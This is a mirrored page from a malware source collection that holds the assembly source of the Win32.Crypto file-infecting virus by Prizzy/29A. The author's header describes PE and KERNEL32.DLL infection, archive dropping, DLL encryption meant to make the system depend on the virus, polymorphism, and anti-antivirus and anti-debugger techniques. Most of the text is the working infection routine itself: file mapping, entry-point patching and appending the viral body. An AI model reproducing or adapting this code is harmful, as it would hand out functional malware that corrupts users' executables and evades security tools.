mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
8660 lines
230 KiB
NASM
8660 lines
230 KiB
NASM
;
|
||
; ÚÄÄÍÍÍÍÍÍÍÍÄÄÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÄÄÍÍÍÍÍÍÍÍÄÄ¿
|
||
; : Prizzy/29A : Win32.Crypto : Prizzy/29A :
|
||
; ÀÄÄÍÍÍÍÍÍÍÍÄÄÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÄÄÍÍÍÍÍÍÍÍÄÄÙ
|
||
;
|
||
; I'm very proud on my very first virus at Win32 platform. It infects EXE
|
||
; files with PE (Portable Executable) header. Also it can compress itself
|
||
; into ZIP/ARJ/RAR/ACE/CAB archivez. If the virus catch DLL opeations, it
|
||
; encrypt/decrypt that by cryptography functions. Thus, we can pronounce
|
||
; the system is dependents on the virus (OneHalf idea).
|
||
;
|
||
; When infected EXE is started, it infects KERNEL32.DLL, hooks some Win32
|
||
; functions and next reboot is actived. It catches "all" file operations,
|
||
; create thread/mutex, run Hyper Infection for API to find archivez, AV
|
||
; checksum files, EXEs and so on.
|
||
;
|
||
; If PHI-API will find an archive program, the virus compress itself and
|
||
; add itself to body (inside, not at the end). My PPE-II does NOT support
|
||
; copro & mmx garbages, only based with many features are new.
|
||
;
|
||
;
|
||
; Detailed Information
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
;
|
||
; Cryptography Area, based on WinAPI (SR2/NT) functions
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; Let us start. I exploited One Half technics for Win32 world, new method
|
||
; in our VX world. You exactly know One Half tries to encode your sectors
|
||
; and if you want to read its he decodes ones and so on, you exactly know
|
||
; what I think. Well, and because I use kernel32 infection I can hook all
|
||
; file functions. Then I decode all DLL files by PHI-II (Hyper Infection)
|
||
; and if the system wants to open DLL file I decode one, and so on. Then,
|
||
; the Win32 system is dependents on my virus. Naturally, the user can re-
|
||
; install Win95/98/NT/2000 but then DLL are in MSOffice, Visual C++, ICQ,
|
||
; Outlook, AutoCAD and many many more appz. For comparison: my Win98 has
|
||
; 831 DLL files and on my all disks are 5103 DLL files (including Win2k).
|
||
; I know this is the perfect way to get all what you want. But I've found
|
||
; out I can't hook all Win32 file operations so, true crypto DLL will be
|
||
; inside Ring0/Ring3 world - my future work...
|
||
;
|
||
;
|
||
; Prizzy Polymorphic Engine (PPE-II new version)
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; I've removed all copro & mmx garbages and I've coded these new stuff:
|
||
; * brute-attack algorithm
|
||
; * random multi-layer engine
|
||
; By "brute-attack" I'm finding right code value by checksum. And because
|
||
; I don't know that number, AV neither. This process can take mostly 0.82
|
||
; seconds on my P233. For more info find "ppe_brute_init:" in this source
|
||
;
|
||
; In the second case I don't decode by default (up to down) but by random
|
||
; multi-layer algorithm. It means I generate the certain buffer and by
|
||
; its I decode up or down. Thus I can generate more then 950 layers and
|
||
; typical some 69 layers. Also the random buffer, behind poly loop, has
|
||
; anti-heuristic protection (gaps) to AV couldn't simulate that process.
|
||
; So, only in my decoding loop are stored the places where the gaps are.
|
||
; Find "ppe_mlayer_generate:" label for many momre information.
|
||
;
|
||
;
|
||
; Infection ZIP/ARJ/RAR/ACE/CAB archivez, including RAR/ACE EXE-SFX
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; I will find these archive programs and by them I will compress some in-
|
||
; fected file by random compression level. Then the dropper is stored in-
|
||
; side archive, not at the end. So, I don't need have any CRC algorithms.
|
||
; However these operations are very complex, especially ZIP infection but
|
||
; it isn't impossible. So, AV cannot check only last file (stored) in ar-
|
||
; chive, but inside it.
|
||
;
|
||
;
|
||
; Main features
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
;
|
||
; * Platforms: Windows 95/98, Windows NT/2000 (tested on 2031 build)
|
||
; * Residency: Yes, KERNEL32 way, working on 95/98 and NT/2k systems
|
||
; * Non-residency: Yes, only K32 infection
|
||
; * Stealth: Yes, DLLs working; opening, copying and loading
|
||
; * AntiDebugging: Yes, some stupid debuggers like TD32; routinues for
|
||
; disable SoftICE 95/NT.
|
||
; * AntiHeuristic: Yes, threads way and multi-layer anti-heuristic
|
||
; * AntiAntivirus: Yes, deleting checksum files, hacking AVAST database
|
||
; * Other anti-*: Yes, anti-emulator, anti-bait, anti-monitor
|
||
; * Fast Infection: Yes/No, infect only 20 EXEs every reboot, but infect
|
||
; all types of archivez on all diskz
|
||
; * Polymomrphism: Yes, using based garbages from Win9x.Prizzy, inclu-
|
||
; ding brute-force way and random multi-layer way
|
||
; * Other features: (a) Use of brute-CRC64 algorithm to find APIs in K32
|
||
; (b) Encoding and decoding DLLs in real time
|
||
; (c) Memory allocations by "CreateFileMapping" func.
|
||
; 'cause of sharing among processes
|
||
; (d) Use of threads, mutexes & process tricks
|
||
; (e) Support of "do not infected" table
|
||
; (f) Checking files by natural logarithm
|
||
; (g) No optimalization, yeah, I don't lie (read
|
||
; "Words from Prizzy" 29A #4 to know why)
|
||
; (h) UniCode support
|
||
;
|
||
;
|
||
; Greetings
|
||
; ÄÄÄÄÄÄÄÄÄÄÄ
|
||
;
|
||
; And finally my greetz go to:
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
; Darkman u're really great inet pal, thanx for fun on #virus :)
|
||
; Benny thanx for big help with threads, mutexes... we're wait-
|
||
; ing for Darkman's trip here, aren't we :) ?
|
||
; GriYo nah, I'd like to understand your ideas... thanx :) !
|
||
; Flush u've really big anti-* ideas, dude
|
||
; MemoryLapse yeah, K32 infection... go out of efnet to undernet
|
||
; LordJulus you have great vx articles, viruses ...
|
||
; Asmodeus finish that virus and release it; thanx for your trust
|
||
; AV companies just where is my win9x.prizzy description :) ?
|
||
; ...and for VirusBuster and Bumblebee
|
||
;
|
||
;
|
||
; Contact me
|
||
; ÄÄÄÄÄÄÄÄÄÄ
|
||
; prizzy@coderz.net
|
||
; http://prizzy.cjb.net
|
||
;
|
||
;
|
||
; (c)oded by Prizzy/29A, December 1999
|
||
;
|
||
;
|
||
|
||
.386p
|
||
.model flat,STDCALL
|
||
|
||
include Include\Win32API.inc
|
||
include Include\UseFul.inc
|
||
include Include\MZ.inc
|
||
include Include\PE.inc
|
||
|
||
extrn ExitProcess:proc
|
||
extrn MessageBoxA:proc
|
||
|
||
;ÄÄÄ´ prepare to program start ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
.data
|
||
db ?
|
||
.code
|
||
|
||
;ÄÄÄ´ some equ's needed by virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
;DEBUG equ YEZ ;only for debug and 1st start
|
||
|
||
mem_size equ (mem_end -virus_start) ;size of virus in memory
|
||
file_size equ (file_end-virus_start) ;size of virus in file
|
||
|
||
infect_minsize equ 4096 ;only filez bigger then 4K
|
||
infect_maxsize equ 100*1024*1024 ;to 100Mb
|
||
|
||
access_ebx equ (dword ptr 16) ;access into stack when
|
||
access_edx equ (dword ptr 20) ;will be used pushad
|
||
access_ecx equ (dword ptr 24)
|
||
access_eax equ (dword ptr 28)
|
||
|
||
search_mem_size equ 100*(size dta+size search_address)
|
||
|
||
;ÄÄÄ´ some structurez for virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
dta_struc struc ;Win32_FIND_DATA structure
|
||
dta_fileattr dd ? ;for FindFirstFile function
|
||
dta_time_creation dq ?
|
||
dta_time_lastaccess dq ?
|
||
dta_time_lastwrite dq ?
|
||
dta_filesize_hi dd ?
|
||
dta_filesize dd ?
|
||
dta_reserved_0 dd ?
|
||
dta_reserved_1 dd ?
|
||
dta_filename db 260 dup (?)
|
||
dta_filename_short db 14 dup (?)
|
||
ends
|
||
|
||
sysTime_struc struc ;used by my Windows API
|
||
wYear dw 0000h ;"hyper infection"
|
||
wMonth dw 0000h
|
||
wDayOfWeek dw 0000h
|
||
wDay dw 0000h
|
||
wHour dw 0000h
|
||
wMinute dw 0000h
|
||
wSecond dw 0000h
|
||
wMilliseconds dw 0000h
|
||
ends
|
||
|
||
Process_Information struc ;CreateProcess: struc #1
|
||
hProcess dd 00000000h
|
||
hThread dd 00000000h
|
||
dwProcessId dd 00000000h
|
||
dwThreadId dd 00000000h
|
||
ends
|
||
|
||
Startup_Info struc ;CreateProcess: struc #2
|
||
cb dd 00000000h
|
||
lpReserved dd 00000000h ;this struc has been stolen
|
||
lpDesktop dd 00000000h ;from "Win32 Help"
|
||
lpTitle dd 00000000h
|
||
dwX dd 00000000h
|
||
dwY dd 00000000h
|
||
dwXSize dd 00000000h
|
||
dwYSize dd 00000000h
|
||
dwXCountChars dd 00000000h
|
||
dwYCountChars dd 00000000h
|
||
dwFillAttribute dd 00000000h
|
||
dwFlags dd 00000000h
|
||
wShowWindow dw 0000h
|
||
cbReserved2 dw 0000h
|
||
lpReserved2 dd 00000000h
|
||
hStdInput dd 00000000h
|
||
hStdOutput dd 00000000h
|
||
hStdError dd 00000000h
|
||
ends
|
||
|
||
File_Time struc ;get/set file time struc
|
||
dwLowDateTime dd 00000000h
|
||
dwHighDateTime dd 00000000h
|
||
ends
|
||
|
||
;ÄÄÄ´ some macroz needed by virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; search "anti-emulators:" for more information
|
||
|
||
@ANTI_E_START macro start_hack, finish_hack
|
||
WHILE (num NE 0)
|
||
push dword ptr [ebp+start_hack + \
|
||
((finish_hack-start_hack) / 4 + 1 - num) * 4]
|
||
num = num - 1
|
||
endm
|
||
num = (finish_hack - start_hack) / 4 + 1
|
||
endm
|
||
|
||
@ANTI_E_FINISH macro start_hack, finish_hack, thread_handle
|
||
WHILE (num NE 0)
|
||
pop dword ptr [ebp+finish_hack - \
|
||
(finish_hack-start_hack) mod 4 - \
|
||
((finish_hack-start_hack) / 4 + 1 - num) * 4]
|
||
num = num - 1
|
||
endm
|
||
call [ebp+ddCloseHandle], thread_handle
|
||
num = (finish_hack - start_hack) / 4 + 1
|
||
endm
|
||
|
||
;ÄÄÄ´ virus code starts here ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
virus_start:
|
||
|
||
call get_base_ebp ;get actual address to EBP
|
||
|
||
mov eax,ebp
|
||
db 2Dh ;sub eax,infected_ep
|
||
infected_ep: dd 00001000h
|
||
db 05h ;add eax,original_ep
|
||
original_ep: dd 00000000
|
||
sub eax,[ebp+__pllg_lsize]
|
||
push eax ;host address
|
||
|
||
; use anti-emulator
|
||
pusha
|
||
@SEH_SetupFrame <jmp __anti_e_1>;set SEH handler
|
||
call $ ;ehm :)
|
||
jmp __return
|
||
__anti_e_1:
|
||
@SEH_RemoveFrame ;reset SEH handler
|
||
popa
|
||
|
||
call find_kernel32 ;find kernel's base address
|
||
|
||
; use anti-emulator
|
||
@ANTI_E_START __thread_1_begin, __thread_1_finish
|
||
lea eax,[ebp+__thread_1] ;thread function
|
||
mov ebx,offset __thread_1_begin + \
|
||
(__thread_1_finish - __thread_1_begin) \
|
||
shl 18h ;upper imm8 register in EBX
|
||
call __MyCreateThread ; * anti-heuristic
|
||
__thread_1_begin equ this byte
|
||
jmp $ ;anti-emulator :)
|
||
jmp __return ;patch this ! random number
|
||
__thread_1_finish equ this byte
|
||
@ANTI_E_FINISH __thread_1_begin, __thread_1_finish, eax
|
||
|
||
; next code...
|
||
call kill_av_monitors ;kill AVP, AVAST32 etc.
|
||
call kill_debuggers ;bye, bye SoftICE, my honey
|
||
call create_mutex ;already resident ?
|
||
jc __return ;go back, if yes
|
||
call crypto_startup
|
||
call infect_kernel ;ehm, find kernel and infect!
|
||
|
||
__return:
|
||
pop eax
|
||
add eax,offset virus_start
|
||
jmp eax ;go back, my lord...
|
||
|
||
;ÄÄÄ´ main function for infect file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
;---------------------------------------------------------
|
||
;This is main function which infects file.
|
||
;
|
||
;Extension support:
|
||
; EXE ... executable file (PE), RAR/ACE SFX file
|
||
; DLL ... kernel32 infection, encypting through PHI-API
|
||
; CAB ... infecting Microsoft Cabinet File
|
||
; ZIP/ARJ/RAR/ACE ... dropper compressed,inside archive
|
||
;
|
||
;Okay, here is truth. I had many problems with EXE and DLL
|
||
;infection in this function. I found out all valuez have
|
||
;to be aligned etc. Especially Win2k need that. I also use
|
||
;"CheckSumMappedFile" function to calculate appz checksum.
|
||
;
|
||
infect_file:
|
||
|
||
; save registers & get delta
|
||
pusha
|
||
call get_base_ebp
|
||
|
||
; get extension
|
||
mov edi,[ebp+filename_ptr]
|
||
|
||
; convert lowercase characters to uppercase
|
||
push edi
|
||
call [ebp+ddlstrlen] ;get length of filename
|
||
inc eax ;number of characters to
|
||
push eax ;progress
|
||
push edi ;filename
|
||
call [ebp+ddCharUpperBuffA] ;convert to uppercase
|
||
|
||
; infect only files in these dirz
|
||
IFDEF DEBUG
|
||
cmp [edi+00000000h],'W\:C' ;"C:\WIN\WEWB4\XX\"
|
||
jnz __if_debug ;directory
|
||
cmp [edi+00000004h],'W\NI'
|
||
jnz __if_debug
|
||
cmp [edi+00000008h],'4BWE'
|
||
jnz __if_debug
|
||
cmp [edi+0000000Ch],'\XX\'
|
||
jz __if_debug2
|
||
__if_debug:
|
||
cmp [edi],'W\:C' ;"C:\WINDOWS\KERN"
|
||
jnz infect_file_exit
|
||
cmp [edi+4],'ODNI'
|
||
jnz infect_file_exit
|
||
cmp [edi+8],'K\SW'
|
||
jnz infect_file_exit
|
||
cmp [edi+8+4],'ENRE'
|
||
jnz infect_file_exit
|
||
__if_debug2:
|
||
ENDIF
|
||
|
||
; check file name (by avoid table)
|
||
mov ebx,[ebp+filename_ptr] ;filename
|
||
lea esi,[ebp+avoid_table] ;avoid table
|
||
call validate_name
|
||
jc infect_file_exit
|
||
|
||
; check AV files (anti-bait)
|
||
call fuck_av_files
|
||
jc infect_file_exit
|
||
|
||
; get extension
|
||
cld
|
||
mov al,'.' ;search this char
|
||
mov cx,filename_size ;max filename_size
|
||
repnz scasb ;searching...
|
||
dec edi ;set to that char
|
||
cmp al,[edi] ;check again !
|
||
jnz infect_file_exit ;shit, bad last char
|
||
|
||
IFDEF DEBUG
|
||
mov eax,[edi-4] ;you can infect only
|
||
cmp eax,'23LE'
|
||
jz __OnlyMyKernel
|
||
cmp eax,'DCBA' ;this file on my disk
|
||
jnz infect_file_exit ;i won't risk
|
||
__OnlyMyKernel:
|
||
ENDIF
|
||
; get file information
|
||
lea esi,[ebp+dta] ;dta structure
|
||
mov edx,[ebp+filename_ptr] ;FileName pointer
|
||
call __MyFindFirst
|
||
jc infect_file_exit ;success ?
|
||
call __MyFindClose ;close handle
|
||
|
||
cmp dword ptr [ebp+it_is_kernel],00000001h
|
||
jz infect_file_continue ;if kernel32, infect it
|
||
|
||
; check extension
|
||
mov eax,[edi] ;get ext of file
|
||
not eax
|
||
cmp eax,not 'EXE.' ;is it EXE file ?
|
||
jnz next_ext_1
|
||
call infect_ACE_RAR ;is it ACE/RAR EXE-SFX file ?
|
||
jnc infect_file_exit
|
||
jmp next_ext_end
|
||
next_ext_1:
|
||
cmp eax,not 'ECA.' ;is it ACE archive file ?
|
||
jnz next_ext_2
|
||
call infect_ACE
|
||
next_ext_2:
|
||
cmp eax,not 'RAR.' ;is it RAR archive file ?
|
||
jnz next_ext_3
|
||
call infect_RAR
|
||
next_ext_3:
|
||
cmp eax,not 'JRA.' ;is it ARJ archive file ?
|
||
jnz next_ext_4
|
||
call infect_ARJ
|
||
next_ext_4:
|
||
cmp eax,not 'PIZ.' ;is it ZIP archive file ?
|
||
jnz next_ext_5
|
||
call infect_ZIP
|
||
next_ext_5:
|
||
cmp eax,not 'BAC.' ;is it CAB archive file ?
|
||
jnz infect_file_exit
|
||
call infect_CAB
|
||
jmp infect_file_exit
|
||
next_ext_end: ;infect if any EXE file
|
||
|
||
; check number of infected files
|
||
cmp [ebp+NewACE.dropper],00000000h
|
||
jz infect_file_continue ;dropper exists ?
|
||
cmp dword ptr [ebp+file_infected],20
|
||
jae infect_file_exit ;infected more then 20 EXEs ?
|
||
|
||
; check file size
|
||
infect_file_continue:
|
||
mov eax,[ebp+dta.dta_filesize]
|
||
cmp eax,infect_minsize ;is filesize smaller ?
|
||
jb infect_file_exit
|
||
cmp eax,infect_maxsize ;is filesize bigger ?
|
||
ja infect_file_exit
|
||
|
||
; set file attributes
|
||
mov ecx,FILE_ATTRIBUTE_NORMAL
|
||
mov edx,[ebp+filename_ptr]
|
||
call __MySetAttrFile
|
||
jc infect_file_exit ;success ?
|
||
|
||
; open file
|
||
mov edx,[ebp+filename_ptr]
|
||
call __MyOpenFile ;open file !
|
||
jc infect_file_restattr
|
||
mov [ebp+file_handle],eax
|
||
|
||
; create a memory map object
|
||
push 00000000h ;name of file mapping object
|
||
push 00000000h ;low 32 bits of object size
|
||
push 00000000h ;high 32 bits of object size
|
||
push PAGE_READONLY ;get needed valuez, etc.
|
||
push 00000000h ;optional security attributes
|
||
push [ebp+file_handle] ;handle to file to map
|
||
call [ebp+ddCreateFileMappingA]
|
||
or eax,eax ;failed ?
|
||
jz infect_file_close
|
||
mov [ebp+file_hmap],eax ;store mapped file handle
|
||
|
||
; view of file in our address
|
||
push 00000000h ;number of bytes to map
|
||
push 00000000h ;low 32 bits of the offset
|
||
push 00000000h ;high 32 bits of the offset
|
||
push FILE_MAP_READ ;access mode
|
||
push [ebp+file_hmap] ;mapped file handle
|
||
call [ebp+ddMapViewOfFile]
|
||
or eax,eax ;failed ?
|
||
jz infect_file_closeMap
|
||
mov [ebp+file_hmem],eax ;mapped file in memory
|
||
|
||
; check file signature
|
||
cmp word ptr [eax.MZ_magic], \
|
||
IMAGE_DOS_SIGNATURE ;test 'MZ'
|
||
jnz infect_file_unMap
|
||
|
||
; check "PE" valuez
|
||
cmp word ptr [eax.MZ_crlc],0000h
|
||
jz infect_file_okay ;no PE ?
|
||
cmp word ptr [eax.MZ_lfarlc],0040h
|
||
jb infect_file_unMap ;bad PE ?
|
||
|
||
infect_file_okay:
|
||
; seek on NT header
|
||
mov esi,eax
|
||
add esi,[eax.MZ_lfanew]
|
||
push esi
|
||
call [ebp+ddIsBadCodePtr] ;can we read memory at least?
|
||
or eax,eax
|
||
jnz infect_file_unMap
|
||
|
||
; check "PE" signature
|
||
cmp dword ptr [esi.NT_Signature], \
|
||
IMAGE_NT_SIGNATURE
|
||
jnz infect_file_unMap ;is it really 'PE\0\0' ?
|
||
|
||
; already infected ?
|
||
mov eax,[ebp+file_hmem] ;mapped file in memory
|
||
add eax,[ebp+dta.dta_filesize]
|
||
mov eax,[eax-00000004h] ;infected dword flag
|
||
call __check_infected
|
||
jnc infect_file_unMap
|
||
|
||
; check header flags
|
||
mov ax,[esi+NT_FileHeader.FH_Characteristics]
|
||
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
|
||
jz infect_file_unMap
|
||
test ax,IMAGE_FILE_DLL ;no DLL ?
|
||
jz infect_file_no_dll
|
||
cmp dword ptr [ebp+it_is_kernel],00000000h
|
||
jz infect_file_unMap ;is it kernel32 infection ?
|
||
|
||
infect_file_no_dll:
|
||
call __getLastObjectTable ;seek on last object table
|
||
|
||
; alloc memory for polymorphic engine
|
||
mov eax,file_size + 30000h
|
||
call malloc
|
||
mov [ebp+mem_address],eax
|
||
add eax,file_size
|
||
mov [ebp+poly_start],eax
|
||
|
||
; get new entry-point (EXE), or change IT of kernel32 ?
|
||
mov eax,[ebx+SH_SizeOfRawData]
|
||
add eax,[ebx+SH_VirtualAddress]
|
||
mov dword ptr [ebp+infected_ep],eax
|
||
mov eax,[esi+NT_OptionalHeader.OH_AddressOfEntryPoint]
|
||
mov dword ptr [ebp+original_ep],eax
|
||
|
||
mov [ebp+poly_finish],mem_size
|
||
|
||
; run Prizzy Polymorphic Engine (PPE-II)
|
||
cmp dword ptr [ebp+it_is_kernel],00000000h
|
||
jnz infect_file_common
|
||
|
||
call ppe_startup
|
||
|
||
; calculate maximum infected file size
|
||
infect_file_common:
|
||
mov eax,[ebx+SH_SizeOfRawData] ;file size
|
||
add eax,[ebx+SH_PointerToRawData]
|
||
add eax,[ebp+poly_finish] ; + virus file size
|
||
add eax,00000004h ; + infected flag
|
||
mov ecx,[esi+NT_OptionalHeader.OH_FileAlignment]
|
||
xor edx,edx
|
||
add eax,ecx
|
||
dec eax
|
||
div ecx
|
||
mul ecx
|
||
push eax
|
||
|
||
; unmap file object
|
||
push [ebp+file_hmem]
|
||
call [ebp+ddUnmapViewOfFile]
|
||
|
||
; close mapping file object
|
||
push [ebp+file_hmap]
|
||
call [ebp+ddCloseHandle]
|
||
|
||
; reopen memory mapped file object
|
||
push 00000000h ;name of file mapping object
|
||
push dword ptr [esp+0000004h];low 32 bits of object size
|
||
push 00000000h ;high 32 bits of object size
|
||
push PAGE_READWRITE ;get needed valuez, etc.
|
||
push 00000000h ;optional security attributes
|
||
push [ebp+file_handle] ;handle to file to map
|
||
call [ebp+ddCreateFileMappingA]
|
||
mov [ebp+file_hmap],eax ;store mapped file handle
|
||
|
||
; view of file in our memory
|
||
push 00000000h ;number of bytes to map
|
||
push 00000000h ;low 32 bits of the offset
|
||
push 00000000h ;high 32 bits of the offset
|
||
push FILE_MAP_WRITE ;access mode
|
||
push [ebp+file_hmap] ;mapped file handle
|
||
call [ebp+ddMapViewOfFile]
|
||
mov [ebp+file_hmem],eax ;mapped file in memory
|
||
|
||
; seek on last object table
|
||
add eax,[eax.MZ_lfanew]
|
||
mov esi,eax
|
||
call __getLastObjectTable
|
||
|
||
; infect "KERNEL32" file OR change EntryPoint
|
||
cmp dword ptr [ebp+it_is_kernel],00000000h
|
||
jz infect_file_entry
|
||
mov [ebp+__pllg_lsize],00000000h ;more info in that func
|
||
call infect_file_kernel ;hook "kernel32" table :)
|
||
jmp infect_file_no_change
|
||
infect_file_entry:
|
||
mov eax,dword ptr [ebp+infected_ep]
|
||
add eax,[ebp+file_size3]
|
||
mov [esi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax
|
||
|
||
; copy mem_address (virus body) to the end of file
|
||
infect_file_no_change:
|
||
push esi
|
||
mov esi,[ebp+mem_address] ;source data
|
||
mov edi,[ebx+SH_SizeOfRawData]
|
||
add edi,[ebx+SH_PointerToRawData]
|
||
add edi,[ebp+file_hmem] ;destination pointer
|
||
mov ecx,[ebp+poly_finish] ;number of bytes to copy
|
||
rep movsb
|
||
pop esi
|
||
|
||
; calculate new physical size
|
||
mov eax,[ebp+poly_finish]
|
||
cmp dword ptr [ebp+it_is_kernel],00000000h
|
||
jz $ + 7 ;this isn't logic but i had
|
||
mov eax,mem_size ;problems in k32 memory
|
||
add eax,[ebx+SH_SizeOfRawData]
|
||
mov ecx,[esi+NT_OptionalHeader.OH_FileAlignment]
|
||
xor edx,edx
|
||
add eax,ecx
|
||
dec eax
|
||
div ecx
|
||
mul ecx
|
||
mov [ebx+SH_SizeOfRawData],eax
|
||
|
||
; calculate new potential virtual size
|
||
mov eax,[ebx+SH_VirtualSize]
|
||
add eax,mem_size
|
||
mov ecx,[esi+NT_OptionalHeader.OH_SectionAlignment]
|
||
xor edx,edx
|
||
add eax,ecx
|
||
dec eax
|
||
div ecx
|
||
mul ecx
|
||
|
||
; if new phys_size > virt_size ==> virt_size = phys_size
|
||
cmp eax,[ebx+SH_SizeOfRawData]
|
||
jnc infect_file_no_update
|
||
mov eax,[ebx+SH_SizeOfRawData]
|
||
infect_file_no_update:
|
||
mov [ebx+SH_VirtualSize],eax
|
||
|
||
add eax,[ebx+SH_VirtualAddress]
|
||
|
||
; infected host increased an image size ?
|
||
cmp eax,[esi+NT_OptionalHeader.OH_SizeOfImage]
|
||
jc infect_no_update_2
|
||
mov [esi+NT_OptionalHeader.OH_SizeOfImage],eax
|
||
infect_no_update_2:
|
||
|
||
; set these PE flags
|
||
or dword ptr [ebx+SH_Characteristics], \
|
||
IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or \
|
||
IMAGE_SCN_MEM_WRITE
|
||
|
||
; already infected flag
|
||
mov eax,02302301h ;special number
|
||
call ppe_get_rnd_range
|
||
inc eax ;it can't be zero
|
||
imul eax,117 ;encrypt one
|
||
pop edi ;file size + virus size
|
||
mov [ebp+file_hsize],edi
|
||
add edi,[ebp+file_hmem] ;mapped file in memory
|
||
mov [edi-00000004h],eax ;already infected flag
|
||
|
||
; calculate new checksum because of Win2k and WinNT :)
|
||
cmp dword ptr [esi+NT_OptionalHeader. \
|
||
OH_CheckSum],00000000h
|
||
jz infect_file_no_checksum
|
||
@pushsz "IMAGEHLP.DLL" ;load "IMAGEHLP.DLL" library
|
||
call [ebp+ddLoadLibraryA]
|
||
or eax,eax ;failed ?
|
||
jz infect_file_no_checksum
|
||
push eax ;parameter for FreeLibrary
|
||
|
||
; get function to calculate checksum
|
||
@pushsz "CheckSumMappedFile" ;get address of this function
|
||
push eax ;library handle
|
||
call [ebp+ddGetProcAddress]
|
||
or eax,eax
|
||
jz infect_file_deload
|
||
|
||
; calculate checksum
|
||
lea ecx,[esi+NT_OptionalHeader.OH_CheckSum]
|
||
push ecx ;receives computed checksum
|
||
call $+9 ;header old checksum
|
||
dd ?
|
||
push dword ptr [ebp+file_hsize]
|
||
push [ebp+file_hmem] ;memory mapped address
|
||
call eax
|
||
|
||
infect_file_deload:
|
||
call [ebp+ddFreeLibrary]
|
||
|
||
; dealloc memory for PPE-II
|
||
infect_file_no_checksum:
|
||
mov eax,[ebp+mem_address]
|
||
call mdealloc
|
||
|
||
; new infected file
|
||
inc dword ptr [ebp+file_infected]
|
||
|
||
; use for acrhive dropper ?
|
||
cmp dword ptr [ebp+dta.dta_filesize],30000
|
||
ja infect_file_unMap ;for archive fsize < 30Kb
|
||
push [ebp+file_hmem] ;mapped file in memory
|
||
call [ebp+ddUnmapViewOfFile]
|
||
push [ebp+file_hmap] ;mapped file object
|
||
call [ebp+ddCloseHandle]
|
||
mov ebx,[ebp+file_handle] ;I must close infected file
|
||
call __MyCloseFile ;coz I'll copy it, etcetera
|
||
call __add_dropper ;compress it by ZIP, RAR ...
|
||
jmp infect_file_restattr
|
||
|
||
infect_file_unMap:
|
||
push [ebp+file_hmem] ;mapped file in memory
|
||
call [ebp+ddUnmapViewOfFile]
|
||
infect_file_closeMap:
|
||
push [ebp+file_hmap] ;mapped file object
|
||
call [ebp+ddCloseHandle]
|
||
infect_file_time:
|
||
lea eax,[ebp+dta.dta_time_lastwrite]
|
||
lea ecx,[ebp+dta.dta_time_lastaccess]
|
||
lea edx,[ebp+dta.dta_time_creation]
|
||
call [ebp+ddSetFileTime], \
|
||
[ebp+file_handle], \
|
||
edx, ecx, eax
|
||
infect_file_close:
|
||
mov ebx,[ebp+file_handle] ;close file handle
|
||
call __MyCloseFile
|
||
infect_file_restattr:
|
||
mov ecx,[ebp+dta.dta_fileattr]
|
||
mov edx,[ebp+filename_ptr] ;restore file attributes
|
||
call __MySetAttrFile
|
||
|
||
infect_file_exit:
|
||
popa ;go to HyperInfection or to
|
||
ret ;Kernel32 hooked functions
|
||
|
||
;---------------------------------------------------------
|
||
;Common file infected semi-functions.
|
||
;
|
||
__getLastObjectTable:
|
||
movzx eax,[esi+NT_FileHeader.FH_NumberOfSections]
|
||
cdq
|
||
mov ecx,IMAGE_SIZEOF_SECTION_HEADER
|
||
dec eax
|
||
mul ecx ;eax=offs of last section
|
||
|
||
movzx edx,[esi+NT_FileHeader.FH_SizeOfOptionalHeader]
|
||
add eax,edx
|
||
add eax,esi
|
||
add eax,offset NT_OptionalHeader.OH_Magic ;seek to l.o. table
|
||
|
||
xchg eax,ebx
|
||
ret
|
||
|
||
;ÄÄÄ´ function to hook some funtions from KERNEL32.DLL ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
;---------------------------------------------------------
|
||
;At last I've finished this unpalatable function. I remem-
|
||
;ber how hardly I have found an interesting source about
|
||
;this method because I have many many problems with this.
|
||
;So, let's begin. At first I will get these addresses:
|
||
; * name table pointer (as are function names)
|
||
